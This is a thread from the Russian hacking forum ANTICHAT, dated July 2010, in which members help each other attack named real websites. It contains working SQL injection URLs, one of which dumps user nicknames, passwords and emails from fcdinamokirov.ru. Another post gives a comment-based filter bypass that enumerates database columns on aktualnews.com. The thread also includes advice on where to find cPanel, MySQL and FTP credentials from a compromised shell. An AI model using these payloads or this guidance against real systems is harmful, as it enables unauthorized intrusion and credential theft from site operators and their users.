ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.07.2010, 20:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от .:GOGA:.
.:GOGA:. said:
Чтение файлов нету, максимум что можно от сюда достать так это юзеров (159)
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),nick,password,email),5,6,7+fr om+users--
.:GOGA:. самый хацкер что ли?
клац
после того как клацнешь, посмотри на номер твоего поста
|
|
|
18.07.2010, 05:26
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791
Репутация:
6
|
|
Что можно сделать с такими правами?)
случайно на одном забугорхостинге нашел - протыкал на своем шелле кнопочку вверх и попал в этот католог все файло и дампы просматривать можно |
|
|
|
18.07.2010, 09:07
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от InfectedM
InfectedM said:
Что можно сделать с такими правами?)
случайно на одном забугорхостинге нашел - протыкал на своем шелле кнопочку вверх и попал в этот католог все файло и дампы просматривать можно и какой ответ ты хочешь услышать? в чем именно твой вопрос конкретно? если сейчас обьяснять тебе что можно делать на серванте с такими правами..я боюсь что на статью потянет..и еще откликнутся еще много добрых молодцев страстно желающие тебе помочь и будут вставлять свои 5 копеек по поводу использования шелла с "такими правам"...
|
|
|
|
18.07.2010, 11:03
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
Провел на форуме:
38329
Репутация:
0
|
|
http://www.site.com/index.php?_a=viewCat&catId=145'
сайт является уязвимым
Я не могу подсчитать число столбцов
уязвимых ошибке
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/site.com/httpdocs/includes/content/viewCat.inc.php on line 41
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a' at line 1
|
|
|
|
18.07.2010, 11:07
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от linuxkernal
linuxkernal said:
http://www.site.com/index.php?_a=viewCat&catId=145'
сайт является уязвимым
Я не могу подсчитать число столбцов
уязвимых ошибке
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/site.com/httpdocs/includes/content/viewCat.inc.php on line 41
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a' at line 1
все экстрасенсы на отдыхе сейчас, вернись через пару месяцев..а лучше никогда
вот тебе ответ
http://www.site.com/index.php?_a=viewCat&catId=145'+правильны й синтаксис запроса SQL
не знаю если поймешь так как ты не русско-язычный..а гугл не сможет перевести, но все твои вопросы попадают под категорию "Пойди туда ,не знаю куда, принеси то, не знаю что"
|
|
|
|
18.07.2010, 17:22
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791
Репутация:
6
|
|
Сообщение от Gorev
Gorev said:
и какой ответ ты хочешь услышать? в чем именно твой вопрос конкретно? если сейчас обьяснять тебе что можно делать на серванте с такими правами..я боюсь что на статью потянет..и еще откликнутся еще много добрых молодцев страстно желающие тебе помочь и будут вставлять свои 5 копеек по поводу использования шелла с "такими правам"...
Хотелось бы узнать где обычно лежат пароли от Cpanel mysql фтп
Хотя ,наверно,без знаний линух смысла нет мне туда суватся, пускай пока живет
|
|
|
|
18.07.2010, 19:06
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от InfectedM
InfectedM said:
Хотелось бы узнать где обычно лежат пароли от Cpanel mysql фтп
Хотя ,наверно,без знаний линух смысла нет мне туда суватся, пускай пока живет
config..
|
|
|
|
18.07.2010, 19:33
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Прочитал статейку про обход фильтрации, но ни один приведённый способ не помог.Не смог применить на практике, но часто встречаюсь. Поэтому материал не усвоил =)
Хотелось бы на живом примере. Вот нашел сайт, вроде подходящий.
http://aktualnews.com/sport/?id=764'
select%20 или (+) c пробелом фильтруется (Forbidden), с /**/ запрос проходит.
Версия 5.0.90-community
http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,version(),4,5--+
Имена таблиц из information_schema.tables получить не могу, т.к. from фильтруется тоже. Вот как его обойти и хотелось бы увидеть на примере.
возможно просто нет доступа к information_schema.tables, но я с таким ещё не встречался.Поэтому мне кажется дело в фильтрации,но я могу и ошибаться.
|
|
|
|
18.07.2010, 19:45
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
auth_root
http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,column_name,4,5/**/FrOm/**/information_schema.columns--+
там фильтр на information_schema.tables
|
|
|
|
18.07.2010, 20:07
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Konqi
Спасибо... А ларчик просто открывался =)
опять не повезло.
Ладно, поищу что нибудь подходящее =)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2256575){kind=avatar}
Похожие темы
Линейный вид
